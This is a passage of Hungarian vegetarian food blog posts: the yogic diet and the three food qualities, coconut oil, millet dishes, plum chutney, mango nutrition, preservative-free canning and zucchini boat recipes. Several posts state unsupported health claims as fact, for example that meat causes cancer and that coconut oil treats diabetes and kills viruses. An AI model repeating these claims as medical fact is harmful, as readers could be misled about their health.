a légzés, test és az elme felett és az egyszerűség. Az ősi jógaírásokban olyan alapelvek, szabályok, előírások melyek az étkezésre vonatkoznak, továbbá részletes leírások találhatóak arra vonatkozóan, hogy az ételek, hogyan hatnak a testre és az elmére. A jógikus étrend alapvetően lakto-vegetáriánus - azaz a jógi húst, halat, tojást nem fogyaszt. A jógikus táplálkozásban preferált ételek jó emésztést biztosítanak, egyszerűek, természetesek, frissek, energiával töltenek fel, egészségessé, ellenállóvá teszik a test és nyugodt, békés elmét eredményeznek. A leírások alapján elsődlegesen előnyben kell részesíteni az olyan élelmiszereket, melyek energiában (pránában ) gazdagok - ilyenek a gyümölcsök, zöldségek, gabonák, magvak melyek vegyszermentesen, természetes körülmények között közvetlenül a nap, a holdfény, a szél, a víz segítségével teremnek. Amikor étkezünk egyik fő cél, hogy a testünk energiához jusson, ha valaki eszik és utána nem azt érzi, hogy tele van energiával és kreatív, hanem elnehezültnek érzi magát, akkor az elfogyasztott étellel nemhogy energiát termelt a testének, hanem energiát vont el a testtől. Egészségügyi állapotnál a legfontosabb, hogy a húsból készült ételek emésztése nehézkes és az emésztési folyamat során számos káros anyag keletkezik, mely a testi egészségre ártalmas és betegségek forrása lehet (ízületi problémák, májbetegség, daganatos megbetegedések), továbbá merevvé teszi a testet. A tartósítószerezett, vegyszerezett, nem természetes ételek is káros hatással vannak az egészségügyi állapotra.(az emésztés javításáról egy korábbi bejegyzésben itt olvashatsz.) Másik fontos szempont a kógikus étrendnél az erőszak nélküliség - ahimsza a jóga egyik lényeges alapelve. Patandzsali a Jóga szútrákban arról ír, hogy ennek az elvnek a megértése nélkül nem lehet megfelelően fejlődni a jógában és nem tudunk fejlődni a többi szabályozó elv gyakorlásában sem. Azonban az ahimsza elvének megvalósítása, megértése segíti a jógit minden más területen a fejlődésben. Fontos, hogy a jógi szeretettel viszonyuljon más élőlények és a környezete felé, tisztelje az életet, ne akarja elpusztítani. Egy gyakorló jógi azért sem fogyaszt húst, mert a testi egészség fenntartható anélkül is, hogy állatoknak kellene meghalnia - a világ számos területén több ezer éves vegetáriánus kultúra van és generációról, generációra több ezer ember nőtt fel hús nélkül, tehát bizonyított, hogy hús nélkül a test egészséges marad. Azaz nincs szükségünk hús fogyasztásra az egészségünk fenntartásához, sokkal inkább élvezeti cikk. Továbbá ismert, hogy az állattenyésztés nagyon súlyosan károsítja a környezetet (levegőszennyezés, vízfogyasztás, földterületek felhasználása) és növény alapú élelmiszerek fogyasztásával nagyon sokat tehetünk a környezet védelméért és megoldható lenne a földön az éhezés kérdése is. A legfontosabb tényező az étkezésnél az ételek, tudatunkra gyakorolt hatása. Az anyagi világot három minőség építi fel: a szattva (jóság), a radzsasz (szenvedély) és a tamasz (tudatlanság). Ezek a minőségek mindent áthatnak, kötőerőknek is hívják őket és leginkább jellemzőik és hatásaik alapján lehet felismerni a különböző kötőerőket. A szattva (jóság) minősége tisztább a többinél, nyugodtság, béke, harmónia, tudás és önkontroll jellemzi. A radzsasz (szenvedély) jellemzője a vég nélküli vágyak, állandó sóvárgás, túlzott aktivitás, izgatottság, nyugtalanság. A tamasz (tudatlanság) jellemzője a hanyag inaktivitás, érdektelenség, őrület, lustaság depresszió, tompaság, negatív érzelmek. Ezeket a minőségeket megismerve fejlődik az érzékenységünk és tudatos választásokon keresztül tudjuk erősíteni egyik vagy másik hatását az életünkben és a tudatunkban. Ez vonatkozik az ételek megválasztására, ha tudjuk melyik étel, hogyan hat a testünkre és az elménkre tudatos választással dönthetünk az ételeken keresztül fizikai közérzetünk vagy elménk állapota felől. A Bhagavad-gita a jóga egyik alapműve, amiből rengeteg hasznos információt tudhatunk meg arról, hogy mi segíti elő és mi gátolja azt, hogy valaki elérje a kiegyensúlyozott, harmonikus életet és fejlődön a jógában. Általános és specifikus ismereteket egyaránt szerezhetünk általa. A VI. fejezetben a következő általános elveket említi "Oh, Arjuna, nem lehet jógi az, aki túl sokat vagy túl keveset eszik vagy alszik. Akinek evése, alvása, pihenése és munkája szabályozott, az a jóga gyakorlásával minden anyagi fájdalmat képes megszüntetni." Azaz nagyon fontos, hogy az életben törekedjünk a kiegyensúlyozottságra, ahogy nagymamáink mondták arany közép út:) A XVII. fejezet a különféle táplálkozási szokásokra részletesebben is kitér a Bhagavad Gíta. ,,A jóság minőségében élők olyan ételeket kedvelnek, amelyek meghosszabbítják az életet, megtisztítják az ember létét, erőt, egészséget, boldogságot és elégedettséget adnak. Az ilyen ételek lédúsak, zsírosak, táplálóak, és örömmel töltik el a szívet. A jóság minőségébe tartozó ételek, vegetáriánus ételek és segítenek minket abban, hogy egészségesek, boldogok, kiegyensúlyozottak legyünk és a testünk erős, rugalmas legyen. A legfontosabb hatást a tudatunkra fejtik ki. Az intelligencia élesebb lesz, tisztább tudatot és gondolkodást eredményez. A szattvikus étkezés segíti a helyes döntéseket, illetve az érzékek kifinomulását fogjuk tapasztalni, valamint a testben pozitív energiaáramlást.Szattvikus ételek: Friss, vegyszermentes tiszta minőségűek. Olyan édesítők melyek természetesek és nem mentek finomítási folyamatokon (nyers nádcukor, méz, aszalt gyümölcsök), a finom friss gyümölcsök (alma, körte, eper, cseresznye, banán, datolya, szőlő, füge, áfonya, narancs, citrom) friss zöldségek (cukkini, brokkoli, répa, cékla, karfiol, paprika, spenót, padlizsán, uborka, karalábé, édeskömény), olajos magvak (mandula, napraforgómag, tökmag, dió, mogyoró, kókusz), gabonafélék (rizs, búza, quinoa, árpa, hajdina, köles) a hüvelyesek, különösen a mung bab, gyógyteák és a házi friss bio és nem homogenizált tejtermékek - tej, ghí (tisztított vaj), frissen készített joghurt és házi sajt. A nyugodt körülmények között, megfelelő lelkiállapotban elfogyasztott étkezés szattvikusan hat ránk. ,,A túlságosan keserű, túl savanyú, sós, erős, csípős, száraz és égető ételt a szenvedély kötőerejében levők kedvelik. Az ilyen ételek boldogtalanságot, szenvedést és betegséget okoznak. A szenvedély minőségébe tartozó ételek a testi-lelki egyensúlyt felborítják, izgatottá tesznek, nyugtalanná, irányíthatatlanná teszik az elmét, felpörgetik az érzékeket és nagyon igénybe veszik az emésztő szervrendszert. A hirtelen intenzív tapasztalatok feltornázzák az ingerküszöböt ezért a normális ingereknél egyre nagyobb tompaságot fogunk tapasztalni. Az emésztőszervrendszer hosszú távon megbetegszik. A radzsasztikus ételek erősítik az egohoz való ragaszkodást és vágyakat gerjesztenek .Ide tartoznak a túl száraz, égetett ételek, túl savanyú, túl sós, túl fűszeres, túl keserű ételek, a hagymafélék, erős fűszerek, kávé, tea, kakaó és csokoládé, A túlzottan gyors evés is radzsasztikusan hat a testünkre és személyiségünkre. ,,A tudatlanság minőségében lévők az olyan ételeket szeretik, amit a fogyasztás előtt több, mint három órával főztek, ami ízetlen, romlott és rothadó, valamint maradékokból és tisztátalan alapanyagokból készült. A tudatlanság minőségébe tartozó ételek nagyon leterhelik az egész testet, blokkolják az energia áramlását, rengeteg energiát vonnak el a testtől. legyengítik az immunrendszert és így a test nem tud ellállni a betegségekkel szemben. Nagyon sok méreganyagot halmoznak fel a testben. Tompaságot, nehézséget, lusta, tunya állapotot eredményeznék a testben és az elmében. Kedvezőtlenül befolyásolják a személyiséget, mert negatív érzelmeket, haragot, ingerlékenységet, depressziót hoznak létre. A tudatlanság minőségébe tartoznak a húsételek (a tengeri élőlények is), tojás, alkohol, erjesztett ételek (mint pl. a nem friss sajtok), ecet és minden étel ami álott, régi, többször lett melegítve. Tamasztikus ételekhez tartoznak még a finomított cukrok, félkészételek, konzervek, fagyasztott élelmiszerek, gyors ételek és a gombafélék és a szénsavas italok. A túl sok étel fogyasztása is tamasztikusan hat a testre és az elmére. A táplálkozás hatása a tudatunkraA jógikus étrend alapvetően természetes, vegyszermentes (bio) alapanyagokból készült, szattvikus, vegetáriánus ételek fogyasztását részesíti előnyben Az elfogyasztott ételek mennyiségére vonatkozóan a jógaírások azt javasolják csak félig töltsük meg a gyomrot étellel, egy negyed részét folyadékkal és hagyjunk egy negyed részt üresen, hogy az emésztés során felszabaduló gázoknak legyen helye. Akkor együnk, amikor éhesek lettünk és az előző táplálékot már megemésztettük - azaz 3-6 óra teljesen el két étkezés között. Lehetőleg este 18:00-ig fogyasszuk el a vacsorát, de lefekvés előtt néhány órával már ne együnk. Ha megfelelően étkeztünk étkezés után tele vagyunk energiával és elégedettnek érezzük magunkat . Amikor elkezdjük felfedezni a jógikus étkezést észrevesszük az alapanyagok változatosságát, ételek sokszínűségét, az ízek és aromák gazdagságát. Vitalitásunk fokozódik, szűnnek súlyproblémáink és javul az emésztésünk és az egészségünk, továbbá tisztulnak az érzékek (ízlelés, szaglás, hallás) és változásokat tapasztalunk viselkedésünkben. A jól összeállított, jógikus étrend egészségügyi és élettani szempontból minden követelménynek megfelel, változatos, ízletes, egészséges. A fenti alapelveket lépésről lépésre javasolt beépíteni az életmódodba. Kezdetben csak egy-egy dolgon próbálj változtatni és figyeld meg a tapasztalásokat - több energiád lett-e, nyugodtabbnak érzed-e magad, etc. Nem szabad hirtelen mindenről lemondani, itt is a fokozatosság a lényeg. Légy szeretettel és türelemmel saját magad felé és fontos, hogy az étkezések örömmel töltsenek el. Mindenkinek energiában gazdag, egészséges táplálkozást és kiegyensúlyozottságot kívánok szeretettel:) Kati
Kókuszolaj jótékony hatásai
2015. augusztus 23. Élj harmóniában
KókuszolajSzerencsére egyre elterjedtebb az egészséges és változatos felhasználású kókuszolaj vagy más néven kókuszzsír. A kókuszolaj belsőleg és külsőleg alkalmazva is igazi csodaszer, táplálja a testet-lelket. A kókuszolaj fehér, kenhető, krémszerű állagú. Szobahőmérsékleten folyékonnyá válik, hűtőben tartva megkeményedik. Elsődlegesen hűsítő hatása van, így a nyári hőségben nagyon jó ha zsiradéknak ezt használjuk. hatásait tekintve erősíti az immunrendszer és energiával tölt fel. Segít normalizálni a koleszterinszintet. Jótékony az emésztésre, gyorsítja az anyagcserét, segít a fogyásban és kedvezően hat a cukorbetegségre. Támogatja a szív- és érrendszert , gátolja az érelmeszesedést. További jótékony hatásai, hogy vírus, baktérium és gombaölő és gyulladás gátló is. Külsőleg és belsőleg alkalmazva is táplálja a bőrt, széppé teszi a hajat. Vegyszermentes (bio) kókuszolajat használj!
Hogyan készítsük el a kölest finoman?
2015. augusztus 22. Éltető ételek
A köles gyakori vendég a konyhámban. Szinte naponta készítek valamilyen formában. Sokan nem tudják, hogy milyen sok jó élettani hatása van, de emellett még az is fontos, hogy finom. A köles nem igényel előzetes áztatást. Alaposan át kell mosni . Sokan nem szeretik az "illatát", ilyenkor én azt tanácsolom, hogy az átmosott kölest kevés zsiradékon pirítsuk át, és így főzzük meg. Minimum 3x mennyiségű vízzel kell elkészíteni. 15 perc alatt elkészül, utána még érdemes kicsit fedő alatt hagyni, hogy párolódjon. Én rendszeresen használom levesbetétként . Tehát, míg korábban galuskát vagy egyéb tésztát tettem a levesbe, most már kölest. Borsóleveshez, zöldségleveshez, sőt, ha néha húslevest készítek, ebbe is köles kerül. Ebbe a bablevesbe is kölest tettem. Az ezerarcú kása . Ez lehet édes vagy akár sós-fűszeres. Az édes köleskását sűrűre főzöm (én meg szoktam darálni a kölest), és mellé öntöm a növényi tejet. Kukoricával vegyesen szoktam ezt főzni, ez az aszaltgyümölcsös édes pulszka. Mindenképpen próbáljátok ki. Vagy növényi tejben főzöm meg, egy kicsit hígabbra hagyva. Ez az édes köles reggeli. Itt óriási lehetőségek vannak. Tehetünk hozzá különböző aszalt gyümölcsöket, kókuszt, fűszerezhetjük fahéjjal, narancsolajjal, gyömbérrel, vaníliával vagy akár szegfűszeggel. Kínálhatunk hozzá házi lekvárokat vagy friss gyümölcsöket. Megszórhatjuk csokireszelékkel vagy kakaóporral, de akár darált mákkal is. Mindig más-más ízt kapunk. A sós kása alapja mindig valamilyen zöldség. Én szeretem, ha sokszínű, ezért a narancssárga répa és valamilyen zöld zöldség (pl. brokkoli, zöldbab) mindig kerül bele. A fűszerezéssel mindig más-más ízvilág kerekedik ki belőle, és a végén ne felejtsük el a friss fűszernövényeket sem. A spenótos köleskása is nagyon finom. Gombócok készítése . Ennek alapja a sűrűre főzött köleskása. Készíthetünk belőle hamis túrógombócot, de én töltöttem már meg a gombócokat szilvalekvárral vagy datolyakrémmel is. Főzelékek sűrítése . Amikor a recept azt írja, hogy lisztes rántást készítsünk, akkor én előszeretettel használom erre a célra a köleslisztet. Szép sárga lesz a színe, és főleg gluténmentes. Sütemények, édességek, pudingok, péksütemények . A köles rudit szerintem mindenki ismeri. Nagyon kedvelt, és kis munkával elkészíthető sütemény. Amikor a tepsibe kölest öntünk, teszünk bele sok finomságot, felöntjük vízzel és megsütjük. Ilyen például a kókuszos kölessüti. De itt sem kell pontosan betartani a receptet, olyan aszalványt, olajos magot, fűszereket és gyümölcsöket teszünk bele, amilyeneket éppen szeretnénk. Viszont egy szabály van. Mindenképp várjuk meg, hogy kihűljön, így szépen szeletelhető lesz. Én császármorzsát is készítettem már kölesliszttel. A gluténmentes zsemlék, kenyerek fontos összetevője a köles. Köretek, egytálételek. Zöldséges raguk kiváló párosítása a köles, de a chilis babhoz is sokszor köles kerül (már csak a komplettálás miatt is). Nagyon finom a medvehagymás köles is, melyet akár gombócozni is lehet. A hamis burgonyapüré alapja is a köles. Krémek, kenőkék . Nagyon finom a köles kőrözött. Ezt még Zsófi lányom is szereti annak ellenére, hogy nem a kedvence a köles. Legalábbis jobb, ha nem tud róla, így minden gond nélkül megeszi. A csecsemők első étele lehet a hozzátáplálás során. Nagyon jó köleskásák kaphatók, de természetesen mi is készíthetünk a babánknak kását, illetve pépet gyümölccsel vagy zöldséggel.
Szilva chutney (csatni)
2015. augusztus 20. Élj harmóniában
Valaki kérte, hogy tegyek fel szilva chutney receptet, mert a szilva szezon közepén sok szilvát kapott. Örömmel teszek a kérésnek eleget, mert a csatnik közül a kedvencem a szilva:) A csatnik (chutney) olyan minden ízlelőbimbónkat igénybe vevő csemegék, melyek célja az ételek ízének kiemelése. Általában egyszerre édes, sós, csípős vagy akár savanyú ízeket is intenzíven hordozhat egy csatni magában. Készülhetnek nyersen vagy főzve is. Radha Red Szilva chutney (csatni) hozzávalói az eredeti recept szerint: - 4 ek. ghí (vagy vaj) - 1,5 tk. örölt koriander - 1/4 tk. őrölt kardamom - 1 egész szárított csili - 3 ek . kókuszreszelék - 1,5 kg érett kékszilva - 2 bögre (500ml) nádcukor - csipetnyi kámfor (elhagyható) Készítsd elő a szilvát, mosd meg, magozd ki és vágd 8 részre. A ghít (vagy vajat) melegítsd fel és szórd bele a koriandert, kardamomot, morzsolt bele a csilit, szórd bele a kókuszreszeléket ezt egy percig pirítsd kis lángon - vigyázz nehogy odaégjen. Tedd hozzá a szilvát - kb. 15 perc alatt szétfő - majd öntsd hozzá a cukrot és kb. 40 percig főzd kis lángon. Bundázott, rántott zöldségekhez kiváló. Vegyszermentes (bio) alapanyagokat használj :) Kámfort indiai boltban pult alól lehet beszerezni Nincs kirakva... az eladónál ha rákérdezel, akkor előveszi a pult alól.:)
Drága déli gyümölcsök
2015. augusztus 20. Sose mondd, hogy soha
Fontos kérdés, hogy mennyire lehet egy étrend környezetbarát, ha a bevitt kalóriák durván felét import gyümölcsökből viszi be, melyek szállítása jelentős terhet ró az amúgy is meggyötört ökoszisztémára. S ezzel egy időben az sem mellékes, hogyan tudja egy átlagember finanszírozni magának ezt az étrendet. A kérdés számomra most különösen aktuális, mivel alig 5 nappal ezelőtt egy házibuliban első falatra beleszerettem az érett, édes mangóba. Azóta munka után mint egy drogos rohanok ahhoz az bizonyos zöldségeshez, ahol 990 Ft egy kiló és lepakolom az összeset, amit a polcon találok, általában 2 kiló csupán. Hazahozom, hogy másnap reggelire magában, illetve banánnal turmixolva élvezzem, de az utóbbi 2 napban, már este sem bírok magammal, éselfogyasztom vacsora előtt/helyett a felét. Mivel ennyire kívánom, arra gondoltam, talán van benne valami, amire nagyon ki van éhezve a szervezetem, ezért megnéztem cronométerben, hogy mi van abban kerek 1000 g mangóban. (Mérni úgy lehet pontosan, ha leméred egészben, utána pedig leméred és kivonod belőle a héj és mag súlyát.) Tehát 1000 g mangó bevitele az alábbiakat jelenti: - 600 kalória - omega 3 zsírsav 0,5 g - omega 4 zsírsav 0,2 g - folsav (napi szükséglet több mint 100 %-a) - A vitamin (napi szükséglet közel 500 %-a - C vitamin (napi szükséglet közel 500 %-a) - E vitamin (napi szükséglet 60 %-a) - K vitamin (napi szükséglet 47 %-a) - B6 vitamin (napi szükséglet 92 %-a) - B3 vitamin (napi szükséglet 48 %-a) - magnézium (napi szükséglet 31 %-a) - réz (napi szükséglet több mint 100 %-a) - kálium (napi szükséglet 50 %-a) - foszfor (napi szükséglet 20 %-a) - mangán (napi szükséglet 35 %-a) - esszenciális aminosavak (napi szükséglet 15-50%-a között, kivéve a cisztin, ami nulla) Ami az árát illeti: Alig 2 órája vagyok ébren ma, de már bevittem mind a fenti sok tápanyagot és még két banánt turmixban, összesen majdnem 800 kalóriát, a napi szükségletem közel felét, ha nem sportolok többet, mint a reggeli jóga. Hozzáadva még a 2 banán árát, lehet ez talán 1100 Ft. Amikor automatás kávét ittam kakóscsigával, akkor csak 300 Ft volt egy reggeli, de nem hiszem, hogy volt abban bármi, amit a testem ténylegesen használni tudott volna. Az izgatószerektől (kávé, csoki, gabona) jól bepörögtem , rövidtávon hasznosnak éreztem, csak hosszú távon nem éri meg. Ami a környezetterhelést illeti: Jövőre egészen biztos vagyok benne, hogy Spanyolországban szeretnék lenni, amikor szezonja van. Egyelőre itt vagyok és megveszem azt, ami sokat utazott, ugyanígy a banánt, datolyát, fügét, avokádót és ananászt. Van bennem bűntudat emiatt. De nem olyan sok. Vegán étrenden élve eleve sokkal kevésbé terhelem meg életmódommal a bolygót, mint az emberek 95 %-a. Amikor valaki meglát egy banánt, rögtön tudja, hogy ez messziről jött. De nagyon sok élelmiszer figyel a polcokon, amiknél nem jut ez eszünkbe, például minden, ami csokis, kávés, vaníliás... Aki beszól nekünk a banánturmixért, annak nyugodtan meg lehet mondani, hogy lesz szíves a saját hazatáján söprögetni. Mindenki tegye meg a világért és önmagáért, amit épp tud. Azért választom az import gyümölcsöt, mert mérlegelem az előnyöket és hátrányokat és ezt tartom legoptimálisabbnak hosszútávon. Meggyőződésem, hogy a bolygónak is az lesz a legjobb, ha az emberiség visszaáll a számára tökéletes gyümölcsalapú étrendre. Ahhoz, hogy ezt most a saját életemben megvalósítsam és képviseljem, szükségem van import gyümölcsökre. Igaz, nyár van és van bőven dinnye, barack, jön már a szőlő is, így most épp meg lehet oldani import nélkül is, de én mint kezdő, örülök mindennek, amivel sikerül megvalósítanom a kis kezdőknek való céljaimat, például, hogy meglegyen a szüskéges kalória, vagy megfelelő legyen az omega 3 és 6 aránya, vagy meglegyen elég bevitt kalcium. Utóbbiról cikk hamarosan!
A befőzés fortélyai, avagy hogyan készítsünk tartósítószermentes finomságokat?
2015. augusztus 19. Éltető ételek
Még mindig él az a tévhit, hogy a lekvárt a cukor tartósítja és szalicil vagy nátrium-benzoát nélkül meg fog romlani a befőtt. Nos, ez tévedés! El lehet tenni ezeket a finomságokat télire mindenféle adalékanyagok nélkül is. De hogyan? A lényeg az üveg sterilizálása! Nem elég csak mosószerrel elmosni az üveget, én minden esetben kifőzöm azokat. Bár erre a célra a mikró is megteszi, de nekem nincs, így marad az üvegek főzése. A teljesen ép, jól záródó befőttesüvegeket mosószerrel mossuk el, öblítsük ki, majd egy nagy lábasba töltsünk vizet, és ebben forraljuk az üvegeket és fedőiket lefedve legalább 5-10 percig. A fertőtlenítés befejeztével egy tiszta konyharuhára, szájával lefele csöpögtessük le az üvegeket, de még véletlenül se törölgessük el, hiszen így nemkívánatos anyagok is bele kerülhetnek. Ennek hiányában a különféle gombák és baktériumok hatására több órás munkánk egykönnyen a penész martalékává válhat. Mindenképp olyan méretű üvegeket válasszunk, ami 1-2 étkezés során elfogy. Ugyanis ezekben nincs tartósítószer, ezért 7-10 nap alatt megpenészedik még a hűtőben is. Teljesen mindegy, hogy milyen gyümölcsből szeretnénk befőttet készíteni , én minden esetben ezzel a módszerrel készítem. Tehát nem kell hozzá cukorszirupos víz, sőt még víz sem! Különféle fűszerekkel persze ízesíthetjük (vanília, fahéj, gyömbér, csillagánizs, stevia levél ...), de nem kötelező. Szilvalekvárt én minden esetben sokáig, jó sűrűre főzök.Viszont vannak olyan gyümölcsök, amelyekből dzsemet készíthetünk. Ebben az esetben elég 10-15 perces főzés is. Ilyenkor a sűrítésre agar-agart használok. Az alapanyagokat minden esetben alaposan mossuk meg, öblítsük át . Majd jól vegyük szemügyre, hogy az eseteges hibákat kivágjuk belőle. Daraboljuk fel, és a belsejét is vizsgáljuk meg, nem kezdett-e belülről romlani. Amennyiben megtöltöttük az üveget pl. lekvárral, utána jól csavarjuk rá a kifőzött kupakot, majd állítsuk fejre úgy 5 percre . Így a benne lévő sterilizálódik, és vákuum képződik. Tehát jól behúzza a kupakot. Ezután jöhet a száraz dunszt, ami azt jelenti, hogy 1-2 paplant előveszünk, és ebbe tesszük az elkészült befőtteket, lekvárokat. Célszerű egyesével újságpapírba becsomagolni, hogy ne piszkítsuk be a paplant (esetleges törés, vagy a külsejére tapadt gyümölcs). Ennek az a célja, hogy szép lassan hűljön ki a finomság. 2-3 nap elteltével mehetnek is a kamra polcaira. Arra figyeljünk, hogy felbontás után hűtőben tároljuk, mert 1-2 héten belül megromlik (ha addig ne fogy el).
Vendégvárásra fel! - vörösbab pörkölt kuszkusszal cukkini hajókban tálalva, és paradicsomos kuszkuszos vendégváró falatkák (laktózmentes, tojásmentes, vegán)
2015. augusztus 19. Zöld Avocado
vörösbab pörkölt kuszkusszal, cukkini hajókban tálalva (laktózmentes, tojásmentes, vegán) Egyszer volt hol nem volt, a messzi messzi galaxisban, az Óperenciás-tengeren túl, ahol a kurta farkú malac túr (és őt nem esszük meg ;-) ), egy igen kreatív konyhatündér nézegette, forgatgatta az ízetlen, és roppanós cukkinit, és azon gondolkodott, milyen ételt készíthetne belőle, mely ízletes és laktató?! Használta már korábban lereszelve, felcsíkozva, karikázva, spirál formára vágva, hosszú vékony szeletekben, sütve, főve, párolva, nyersen, de most valami újra vágyott! ;-) Vakargatta a fejét, nagyon koncentrált, és addig-addig nézegette ezeket a zöld tökféléket a tengerparton állva, miközben a tekintete hol a cukkinikre, hol a kikötőbe érkező hajókra esett, amíg egyszer csak felkiáltott! "Ez az! A hajók! Cukkini hajókat fogok készíteni!" :-) A cukkini formája tökéletesen biztosítja, hogy egyszerű mozdulatokkal hajó törzseket készítsünk belőlük, amiket aztán különböző ízesítésű töltelékekkel (rakománnyal) megtölthetünk, és nyersen vagy akár a sütőben egy kicsit megpuhítva, megpirítva jó ízűen elfogyaszthatunk! A tölteléktől függően lehet ez egy könnyed vacsora, vagy vendégfogadó falatkák, de akár egy kiadós főételt is készíthetünk belőlük! :-) olaszos ízvilágú, paradicsomos, kuszkuszos vendégváró falatkák (laktózmentes, tojásmentes, vegán) A nyár egyik nagy slágere a cukkini. Sokan nem szeretik (korábban én sem), de csak azért, mert nem értik ezt az egyszerű, de mégis nagyszerű zöldséget. A cukkini önmagában történő rágcsálása, nem sok embernek okoz örömet, és élménydús étkezést. Bár magas víztartalmának, és semleges ízének köszönhetően tökéletes nassolni való nyersen is, a meleg nyári napokra, azért nem muszáj nekiesnünk csak úgy, önmagában. Készíthetünk a nyers cukkini csíkok mellé finom mártogatósokat (pl.: fűszeres magyaros mártogatós), vagy felhasználhatjuk a cukkinit hidegen-melegen krémlevesként, enyhén fűszereve. Rengeteg főétel alapanyaga is lehet ez a semleges ízű, zöld tökféle (példa receptek ebben a bejegyzésben), salátákban is növelhetjük vele a tápértéket, de még kevert sütemények textúráját is javíthatjuk vele. :-) Ha felismerjük az elsőre unalmasnak tűnő cukkiniben rejlő nagyszerű lehetőségeket, egy olyan konyhai alapanyagra lelhetünk, mely megkönnyíti egészséges ételeink elkészítsését a jövőben. Ráadásul még olcsó is, és az év nagy részében hozzá lehet jutni. Kísérletezzünk vele bátran! ;-) Rengeteg féle fajta cukkini hajó receptet találhatunk a magyar és idegen nyelvű honlapokon, szakácskönyvekben. Én itt a Zöld Avocado gasztroblogon most hoztam nektek egy magyaros ízvilágú, babos pörköltet kuszkusszal, cukkini hajókban tálalva, illetve egy nagyon hasonló, de olaszos ízvilágú paradicsomos kuszkuszos tölteléket, cukkini alapokon, melyek vendégváró falatkáknak is tökéletesek! Fogadjátok sok szeretettel őket, és engedjétek a fantáziátokat szabadon, amikor elkészítitek a saját hajóitokat, akár a gyerekekkel közösen! ;-) olaszos ízvilágú, paradicsomos, kuszkuszos vendégváró falatkák (laktózmentes, tojásmentes, vegán) HOZZÁVALÓK: magyaros cukkini hajókhoz: - 2 db vastag, roppanós cukkini - 1/2 bögre kuszkusz (ha gluténmentesre szeretnénk, használjunk GM gabonát pl.: kölest, barna rizst, amarántot, vagy quinoát) - 1 bögre forró víz - 1 db bio vörösbab konzerv (vagy előfőzött száraz bab) - 1/2 db vöröshagyma - 2 ek extra szűz olíva olaj - Himalája só, frissen őrölt fekete bors, 2-3 ek fűszerpaprika őrlemény - 1 doboz szójatejföl a hajók tetejének meglocsolására olaszos vendégváró falatkákhoz: - 2 db vékonyabb nyers cukkini - 1/2 bögre kuszkusz (ha gluténmentesre szeretnénk, használjunk GM gabonát pl.: kölest, barna rizst, amarántot, vagy quinoát) - 1 bögre forró víz - 100 g bio paradicsom püré / sűrített paradicsom - 1 db nagyobb sárgarépa lereszelve - 1/2 db vöröshagyma - 2 ek extra szűz olíva olaj - 2-3 friss bazsalikom levél - Himalája só, frissen őrölt fekete bors, oregano - kendermag a tetejére - (söréleszőtpehely - opcionálisan) vörösbab pörkölt kuszkusszal, cukkini hajókban tálalva (laktózmentes, tojásmentes, vegán) ELKÉSZÍTÉS: KUSZKUSZOS BAB PÖRKÖLT CUKKINI HAJÓKBAN TÁLALVA Előkészítjük a kuszkuszt a szokásos módon. Forralunk 1 bögre vizet. Beletesszük az 1/2 bögre kuszkuszt egy mély keverő tálba, majd ráborítjuk a forró vizet. Sózzuk a tetejét, majd gyorsan, légmentesen lezárjuk a tálat folpackkal. Hagyjuk, hogy a kuszkusz magába szívja a vizet, és a vízgőzben megpuhuljon, megdagadjon. Kb. 15 perc alatt teljesen magába szívja a vizet, és elkészül a kuszkusz. Közben előkészítjük a cukkini hajókat, és a tölteléket. Alaposan megmossuk a cukkiniket, és levágjuk a fás végeit. Majd 4 részre vágjuk a cukkinit úgy, hogy egyszer keresztbe szétvágjuk az egész cukkinit, majd a két fél cukkinit hosszában is ketté vágjuk. Így lesz belőle 4 nagyjából egyforma méretű cukkini hajó alap. Fogunk egy evőkanalat, és kikaparjuk a "hajók" belsejét (a magos, puhább részt) egy tálba. Így készítjük el a hajó testet! ;-) Hagyjunk egy kb. 1 cm-es cukkini "hús" részt a zöld héjon. (Lásd a képen). Miután mind a két cukkinivel elvégeztük ezt az előkészítő műveletünket, kapnunk kell 8 db cukkini törzsből kivájt csónakot, és egy tálban összeömlesztve a kikapart cukkini belsőket. (Érdemes apró cafatokban kikaparni őket, nem nagy darabokba, mert könnyebb lesz bánni velük később.) Feltesszük egy edényben az apróra vágott vöröshagymát dinsztelődni az olíva olajon. Amint a hagyma aranybarna, hozzákeverjük a fűszerpaprika őrleményt, és elkeverjük. Majd hozzáöntjük a vörösbab konzervet a levével együtt, illetve a kikapart cukkini belsőket is. Sózzuk, borsozzuk, (ha szükséges még teszünk hozzá fűszerpaprikát), majd folyamatos kevergetés mellett kb. 10 perc alatt készre főzzük a babos cukkini "pörköltet". Miután elkészült a pörkölt, lezárjuk a tűzhelyet, és hozzákeverjük a készre párolt kuszkuszt. Az egészet egybekeverve kapjuk meg a végleges tölteléket. Ha szükséges, sózzuk és borsozzuk még egyszer a tölteléket. Egy jó fűszeres, piros, pörköltszerű ízt szeretnénk kapni. A cukkini hajó törzsekbe óvatosan belekanalazgatjuk a babos-cukkinis pörkölt tölteléket, meglocsoljuk egy kevés szója tejföllel a tetejét, és 180°C fokra előmelegített sütőbe tesszük a hajókat. Kb.15 perc múlva már meg is puhultak ezek a finom, és különleges cukkini hajók. Tálalhatjuk friss saláta levelekkel, vagy szimplán így önmagukban is ezeket a teljesértékű, könnyen emészthető, egészséges és ízletes főételeket! ;-) vörösbab pörkölt kuszkusszal, cukkini hajókban tálalva (laktózmentes, tojásmentes, vegán) Jó étvágyat kívánunk! :-) OLASZOS PARADICSOMOS VENDÉGVÁRÓ FALATKÁK Az előző recepthez hasonlóan elkészítjük a kuszkuszt, és megdinszteljük a vöröshagymát. Az aranybarna vöröshagymához hozzákeverjük a reszelt sárgarépát, a paradicsom pürét, 1dl tiszta vizet, a sót, borsot, és oregánót, a friss bazsalikom leveleket, majd az egészet kb.5 perc alatt készre főzzük. Hozzáadjuk a készre párolt kuszkuszt. A nyers cukkiniket alaposan megmossuk, és levágjuk a fás végeit. Kb.1,5 cm-es vatagságú karikákat vágunk a cukkinikből, és a tetejükre kanalazzuk az olaszos paradicsomos kuszkusz tölteléket. Ezúttal nem tettem be őket a sütőbe, hanem így, nyers és roppanós cukkini falatokkal kínáltam a vendégeket. Megszórtam a vendégváró falatokat kendermaggal, hogy a növényi fehérje is biztosítva legyen a zöldség és gabona mellett. (Ha van otthon sörélesztőpehely, szórjuk meg azzal is.) Ha valaki nem szereti a nyers cukkinit, akkor mielőtt rákanalazná a tölteléket, puhítsa meg a cukkini karikákat a sütőben kb. 10 perc alatt, majd utána tegye rá a paradicsomos kuszkuszt. olaszos ízvilágú, paradicsomos, kuszkuszos vendégváró falatkák (laktózmentes, tojásmentes, vegán) Tápanyagban gazdag, örömteli vendégvárást kívánunk! 